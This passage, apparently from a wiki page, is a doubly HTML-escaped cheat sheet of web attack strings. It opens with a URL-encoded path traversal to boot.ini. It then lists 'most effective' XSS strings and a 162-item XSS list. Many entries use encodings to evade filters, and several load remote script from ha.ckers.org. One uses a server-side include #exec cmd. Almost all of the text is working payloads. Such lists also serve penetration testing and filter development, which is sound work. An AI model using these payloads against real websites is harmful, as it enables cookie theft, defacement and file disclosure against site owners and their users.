/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;&amp;quot;--&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;'&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;quot;&amp;lt;SCRI&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;about:&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
